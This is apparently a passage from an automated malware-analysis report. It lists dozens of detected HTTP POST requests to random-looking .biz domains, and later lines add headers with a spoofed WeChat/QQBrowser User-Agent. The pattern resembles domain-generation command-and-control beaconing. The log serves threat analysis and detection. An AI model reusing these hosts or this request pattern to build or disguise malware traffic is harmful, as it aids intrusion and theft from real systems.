Source: global traffic HTTP traffic detected: POST /yrhkaiacfhbp HTTP/1.1 Host: nwdnxrd.biz Content-Length: 802
Source: global traffic HTTP traffic detected: POST /lvawmhxu HTTP/1.1 Host: ecxbwt.biz Content-Length: 778
Source: global traffic HTTP traffic detected: POST /hkamlwlybbh HTTP/1.1 Host: ereplfx.biz Content-Length: 802
Source: global traffic HTTP traffic detected: POST /fokcciedcqjopse HTTP/1.1 Host: pectx.biz Content-Length: 778
Source: global traffic HTTP traffic detected: POST /yxknqhe HTTP/1.1 Host: ptrim.biz Content-Length: 802
Source: global traffic HTTP traffic detected: POST /bvfgvukbuqpt HTTP/1.1 Host: zyiexezl.biz Content-Length: 778
Source: global traffic HTTP traffic detected: POST /q HTTP/1.1 Host: banwyw.biz Content-Length: 778
Source: global traffic HTTP traffic detected: POST /lw HTTP/1.1 Host: znwbniskf.biz Content-Length: 802
Source: global traffic HTTP traffic detected: POST /mtdievukjebc HTTP/1.1 Host: wxgzshna.biz Content-Length: 778
Source: global traffic HTTP traffic detected: POST /gpyvldlckbfoes HTTP/1.1 Host: cpclnad.biz Content-Length: 802
Source: global traffic HTTP traffic detected: POST /buaqnbkgjr HTTP/1.1 Host: wxgzshna.biz Content-Length: 778
Source: global traffic HTTP traffic detected: POST /o HTTP/1.1 Host: mjheo.biz Content-Length: 802
Source: global traffic HTTP traffic detected: POST /ehwru HTTP/1.1 Host: zrlssa.biz Content-Length: 778
Source: global traffic HTTP traffic detected: POST /lvdayepitqcdyi HTTP/1.1 Host: wluwplyh.biz Content-Length: 802
Source: global traffic HTTP traffic detected: POST /sn HTTP/1.1 Host: jlqltsjvh.biz Content-Length: 778
Source: global traffic HTTP traffic detected: POST /lvojr HTTP/1.1 Host: zgapiej.biz Content-Length: 802
Source: global traffic HTTP traffic detected: POST /wkwfipyoltumu HTTP/1.1 Host: jifai.biz Content-Length: 802
Source: global traffic HTTP traffic detected: POST /fxrfgipsrdogf HTTP/1.1 Host: xyrgy.biz Content-Length: 778
Source: global traffic HTTP traffic detected: POST /jagvrjcebgwmee HTTP/1.1 Host: xnxvnn.biz Content-Length: 802
Source: global traffic HTTP traffic detected: POST /xqpxqo HTTP/1.1 Host: htwqzczce.biz Content-Length: 778
Source: global traffic HTTP traffic detected: POST /fnppu HTTP/1.1 Host: htwqzczce.biz Content-Length: 778
Source: global traffic HTTP traffic detected: POST /llrqvc HTTP/1.1 Host: ihcnogskt.biz Content-Length: 802
Source: global traffic HTTP traffic detected: POST /yro HTTP/1.1 Host: kvbjaur.biz Content-Length: 778
Source: global traffic HTTP traffic detected: POST /hegy HTTP/1.1 Host: kkqypycm.biz Content-Length: 802
Source: global traffic HTTP traffic detected: POST /g HTTP/1.1 Host: uphca.biz Content-Length: 778
Source: global traffic HTTP traffic detected: POST /hwyhtns HTTP/1.1 Host: fjumtfnz.biz Content-Length: 778
Source: global traffic HTTP traffic detected: POST /pjkmdseqxhhvplr HTTP/1.1 Host: uevrpr.biz Content-Length: 802
Source: global traffic HTTP traffic detected: POST /gjsue HTTP/1.1 Host: fgajqjyhr.biz Content-Length: 802
Source: global traffic HTTP traffic detected: POST /toabwtjv HTTP/1.1 Host: hlzfuyy.biz Content-Length: 778
Source: global traffic HTTP traffic detected: POST /vw HTTP/1.1 Host: hagujcj.biz Content-Length: 802
Source: global traffic HTTP traffic detected: POST /ojwsrlrloa HTTP/1.1 Host: rffxu.biz Content-Length: 778
Source: global traffic HTTP traffic detected: POST /wtojknw HTTP/1.1 Host: sctmku.biz Content-Length: 802
Source: global traffic HTTP traffic detected: POST /haroldungxt HTTP/1.1 Host: cikivjto.biz Content-Length: 778
Source: global traffic HTTP traffic detected: POST /wjs HTTP/1.1 Host: qcrsp.biz Content-Length: 802
Source: global traffic HTTP traffic detected: POST /bbqlwawxhwkmtrfc HTTP/1.1 Host: qncdaagct.biz Content-Length: 778
Source: global traffic HTTP traffic detected: POST /am HTTP/1.1 Host: sewlqwcd.biz Content-Length: 802
Source: global traffic HTTP traffic detected: POST /xahrrvaf HTTP/1.1 Host: dyjdrp.biz Content-Length: 802
Source: global traffic HTTP traffic detected: POST /rfuetphopheyd HTTP/1.1 Host: shpwbsrw.biz Content-Length: 778
Source: global traffic HTTP traffic detected: POST /bvynwxs HTTP/1.1 Host: napws.biz Content-Length: 802
Source: global traffic HTTP traffic detected: POST /xxyycbpqqgrofbr HTTP/1.1 Host: qvuhsaqa.biz Content-Length: 802
Source: global traffic HTTP traffic detected: POST /gmkfkxvhjjwggemm HTTP/1.1 Host: cjvgcl.biz Content-Length: 778
Source: global traffic HTTP traffic detected: POST /fumyjx HTTP/1.1 Host: apzzls.biz Content-Length: 802
Source: global traffic HTTP traffic detected: POST /hubil HTTP/1.1 Host: neazudmrq.biz Content-Length: 778
Source: global traffic HTTP traffic detected: POST /x HTTP/1.1 Host: krnsmlmvd.biz Content-Length: 802
Source: global traffic HTTP traffic detected: POST /bulntsganndw HTTP/1.1 Host: pgfsvwx.biz Content-Length: 778
Source: global traffic HTTP traffic detected: POST /ckivxpl HTTP/1.1 Host: pgfsvwx.biz Content-Length: 778
Source: global traffic HTTP traffic detected: POST /ltyaxjqvibv HTTP/1.1 Host: aatcwo.biz Content-Length: 778
Source: global traffic HTTP traffic detected: POST /pt HTTP/1.1 Host: nlscndwp.biz Content-Length: 802
Source: global traffic HTTP traffic detected: POST /wu HTTP/1.1 Host: bzkysubds.biz Content-Length: 802
Source: global traffic HTTP traffic detected: POST /dgltjhlriyylmg HTTP/1.1 Host: kcyvxytog.biz Content-Length: 778
Source: global traffic HTTP traffic detected: POST /leqoagwnoid HTTP/1.1 Host: ltpqsnu.biz Content-Length: 802
Source: global traffic HTTP traffic detected: POST /aiql HTTP/1.1 Host: nwdnxrd.biz Content-Length: 778
Source: global traffic HTTP traffic detected: POST /yqqmngrjnxvc HTTP/1.1 Host: vnvbt.biz Content-Length: 802
Source: global traffic HTTP traffic detected: POST /exygmnocmwksy HTTP/1.1 Host: ereplfx.biz Content-Length: 778
Source: global traffic HTTP traffic detected: POST /vbohqiwv HTTP/1.1 Host: ypituyqsq.biz Content-Length: 802
Source: global traffic HTTP traffic detected: POST /yjcuxjh HTTP/1.1 Host: ijnmvqa.biz Content-Length: 802
Source: global traffic HTTP traffic detected: POST /rwfu HTTP/1.1 Host: ptrim.biz Content-Length: 778
Source: global traffic HTTP traffic detected: POST /x HTTP/1.1 Host: tltxn.biz Content-Length: 802
Source: global traffic HTTP traffic detected: POST /levm HTTP/1.1 Host: vgypotwp.biz Content-Length: 802
Source: global traffic HTTP traffic detected: POST /opxc HTTP/1.1 Host: znwbniskf.biz Content-Length: 778
Source: global traffic HTTP traffic detected: POST /q HTTP/1.1 Host: giliplg.biz Content-Length: 802
Source: global traffic HTTP traffic detected: POST /aldycdkjcqrlqwgv HTTP/1.1 Host: pywolwnvd.biz Content-Length: 802
Source: global traffic HTTP traffic detected: POST /kuspgbuc HTTP/1.1 Host: cpclnad.biz Content-Length: 778
Source: global traffic HTTP traffic detected: POST /ixcw HTTP/1.1 Host: ssbzmoy.biz Content-Length: 802
Source: global traffic HTTP traffic detected: POST /yvoikxldsfcfgso HTTP/1.1 Host: mjheo.biz Content-Length: 778
Source: global traffic HTTP traffic detected: POST /ugrdtwtacn HTTP/1.1 Host: wluwplyh.biz Content-Length: 778
Source: global traffic HTTP traffic detected: POST /exeqm HTTP/1.1 Host: cvgrf.biz Content-Length: 802
Source: global traffic HTTP traffic detected: POST /dknfakeq HTTP/1.1 Host: npukfztj.biz Content-Length: 802
Source: global traffic HTTP traffic detected: POST /mmqkhapthxjsnh HTTP/1.1 Host: zgapiej.biz Content-Length: 778
Source: global traffic HTTP traffic detected: POST /ndtogcedgg HTTP/1.1 Host: zgapiej.biz Content-Length: 778
Source: global traffic HTTP traffic detected: POST /hkulo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic HTTP traffic detected: POST /sdsuahsrg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jifai.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /otgkntfmpmq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic HTTP traffic detected: POST /umcybsxuaomkr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xnxvnn.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /ilidqggw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic HTTP traffic detected: POST /digagk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ihcnogskt.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /iiuonvofxn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic HTTP traffic detected: POST /nroqcaxg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ihcnogskt.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /nuoraorjkrhft HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: kkqypycm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /krrofgdqsat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: uevrpr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /smeisoexdoewo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: uevrpr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /yhsygfwinibyek HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fgajqjyhr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /tdfnnvngg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: hagujcj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /ydwthbku HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sctmku.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /jmryxuilbmw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qcrsp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /vbgexw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic HTTP traffic detected: POST /p HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qcrsp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /flarmrvjgo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sewlqwcd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /iatkorfmnwf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dyjdrp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /cmvqnkktnlmsiyi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: napws.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /vkwyeg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: napws.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /tflprvg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qvuhsaqa.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /ybbogla HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: apzzls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /cgoaec HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: krnsmlmvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /qvm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic HTTP traffic detected: POST /vatx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nlscndwp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /cuqo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bzkysubds.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /hui HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ltpqsnu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /kiywguufjdpqtpf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vnvbt.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /ehquov HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ypituyqsq.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /vppkcegilvgf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ypituyqsq.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /hpk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ijnmvqa.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /fkax HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tltxn.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /kkr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vgypotwp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /gqqjufjjpxhxqwb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: giliplg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /obdt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /pirbxlgko HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic HTTP traffic detected: POST /uvrr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /xvbdrvgarw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /rxnqqlqsl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /wxnfkxfh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /cjwsbx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /qcbsfnonovikje HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /lrywafs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /hbcdkqyacacfvqqp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /hnpfnrirpigau HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xlfhhhm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic HTTP traffic detected: POST /goxnn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ifsaia.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic HTTP traffic detected: POST /qa HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /xce HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: saytjshyf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
